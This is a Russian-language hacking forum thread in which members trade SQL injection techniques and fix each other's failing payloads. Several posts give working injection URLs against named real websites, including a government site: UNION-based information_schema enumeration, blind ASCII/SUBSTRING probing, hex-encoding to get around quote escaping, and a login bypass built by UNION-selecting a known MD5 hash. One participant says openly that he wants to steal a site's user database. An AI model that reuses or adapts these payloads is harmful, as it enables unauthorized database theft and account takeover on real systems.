bumerok, юзай подзапросы http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496+or+1=(select+top+1+table_name+from+information_schema.tables);--
Есть SQL запрос. 1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2 Т.е. ' нефильтруется и т.п. НО Фильтруется > на _. Что делать? ps %3E Неработает
Можете кто нить разжевать в чем проблема. Вывод дает PROFILING (я так понял это имя таблици), делаю дальше и мне выдает ошибку че за херня ?(
Вывод дает PROFILING (я так понял это имя таблици), делаю дальше Цитата: http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=PRO FILING+limit+0,1-- потому что надо имя таблицы брать в кавычки http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='PROFILING'+limit+0,1-- но у тебя они слэшируются, значит переводи в hex http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x50524f46494c494e47--
как правильно использовать SQL Hex? Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт Нужно ещё что-то перед хексом прописать?
Ну например заюзать between 1' and 1=if(ascii(substring(user(),1,1)) between 0 and 150,1,0)--+ А ты уверен, что что-то должно выдавать именно на этот логин? =) Какбэ и все
Доброго времени суток. имеется сайт на движке joomla (хз какая версия... - $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ (может кто подскажет что за версия)) путь к админке я нашёл, правда хз что с ней делать. попробывал вот эту скуль index.php?option=com_content&task=vote&id=1&Itemid =1&cid=1&user_rating=1,rating_sum=[sql (любая цифра)] - на странице отобразилась шапка сайта и правая сторона, в середине всё пустое...(интересно что это даёт...). затем нашёл путь _http://sate.ru/plugins/content/highslide/ там рисунки. в чём самый прикол то, что какие бы скуль инжект не забивал в строку вот таким способом - _http://sate.ru/index.php..скульинжект то всё время показывает ошибку 404, а когда забиваю таким способом - _http://sate/administrator/index.php..скульинжект то ни чего не выдаётся и не изменяется, просто как бы прогрузочка прошла и всё...а что изменилось или нет...хз.... так вот может кто подскажет что да как, может ссылочки какие даст кто, а то всё уже перечитал, хочу ещё чёнить почитать повтыкать, или совет какой попробывать.... А цель вообще всего этого, попробывать БД стянуть, не так давно на этом ресурсе 3 акка моих кто то спёр, вот хочу попробывать тоже...заодно разобраться во всём этом...))) зы. знаю 100% что другте люди тырят от туда базу, это очевидно по тому что мои данные стырили.... зыы. попробывал методы которые описываются здесь реакции ноль...
Работает или Microsoft-IIS/5.0 Htaccess? надо сделать запрет на выполнение пхп Code: RemoveHandler .php .phtml .php3 AddType application/x-httpd-php-source .php .phtml .php3 он его не воспринимает вообще,если оно так и должно быть то как найти вход?
Shadrin, .ht* только для apache! Есть бажный сайт, при подставке кавычки в авторизацию пишет Code: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1 select * from customers where customers_email_address=''' [TEP STOP] Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже...
Запрос НЕ многострочный: 1. Запрос видно в ошибке. 2. Если бы я обрезал только одну строку комментарием #, то была бы ошибка. 3. Комментарий /* режет.
посмотри на запрос, у тебя он возвращает любой поле авторизация (например) [данные-из-какой-то-колонки-customers]+pass юзай вывод в ошибках /add более подробно написано ниже)
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли. Т.е. там что-то типо такого: PHP: $res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'"); $item = mysql_fetch_array($res); if(md5($_POST['password']) == $item['password']) { echo "LOGINED"! } else { echo "FAIL!"; } Как вариант: 1. Узнать количество столбцов 2. Узнать в каком столбце хранится пароль 3. используя union select вернуть те данные, которые подойдут для успешного логина. Те: Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий: login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4-- password: qwerty
Точно... Просто привык, что все данные берутся из БД, никогда не встречался с такими скриптами, поэтому и не понял
